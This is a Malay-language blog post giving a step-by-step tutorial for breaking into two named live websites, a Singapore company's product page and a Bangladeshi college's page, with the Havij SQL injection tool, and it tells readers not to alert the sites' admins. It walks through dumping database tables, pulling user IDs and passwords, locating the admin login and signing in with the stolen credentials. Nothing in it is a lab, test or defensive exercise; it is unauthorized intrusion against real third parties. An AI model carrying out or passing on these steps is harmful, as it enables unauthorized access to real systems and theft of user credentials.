kita ada website yang vuln .. shuiitt..!!.. jangan cakap dengan admin dia k.. hehe :)


http://www.smitechasia.com.sg/product.php?selected_product_id=206

http://www.bargunagovcollege.edu.bd/Details.php?Id=32



ok .. sekarang kita ada dua target .. tak dara lagi dah ... ini mengunakan havij , bukan manual.. kalau manual lagi best sebab berasa hacking tu ..heheh

ok .... masukan salah satu link tu kedalam kotak havij ... macam ni...
saya mengunakan havij 1.15 .. full.. kalau korang nak boleh cari dekat entri tepi tu..



ok.. lepas tu tekan analyze ..

nanti akan nampak hasil nya .. korang tunggu sampai havij tu i'm Elde

ok... selepas itu korang tekan pula table .. rujuk di bawah




sudah nampak satu table .. tak perlu tekan find database .. sebab nanti dia auto detect ok ...

selepas itu klik pula get table .. dan tunggu scanning lagi ... buat coffe ke dulu .. relaks2..

maka hasilnya akan jadi macam ni




nampak anak panah tu? korang tik dekat kotak tu macam dekat gambar atas tu ok..

leps tu tekan pula get collum sebelah dengan get table..

selepas itu akan keluar user_id dan password ..

tik pada kotak user_id dan password...dan tekan get data sebelah get collum ..kita main sebelah sebelah je ni.. hehe

lepas tu akan keluar macam ni ..




klik pada nama fiona .. untuk maklumat korang .. user name fiona itu tadi diperolehi dari user_id .. itu database dia .. sama seperti password ..

selepas itu korang klik pada nama fiona dan paste pada admin login ,,,

korang tahu tak admin login??

ok .. korang boleh cari mengunakan havij .. kalau tak nak .. nak yang lebih advance korang boleh guna perl script .. tutorial ada dibuat ...

boleh rujuk pada bar tutorial ,...

sesudah scan admin login .. haa .. jumpa pun..

copy username dan password dan masukan user dan pass dekat kotak yang disediakan ,.,.

ok .,. selesai.,..

enjoy dan comment ...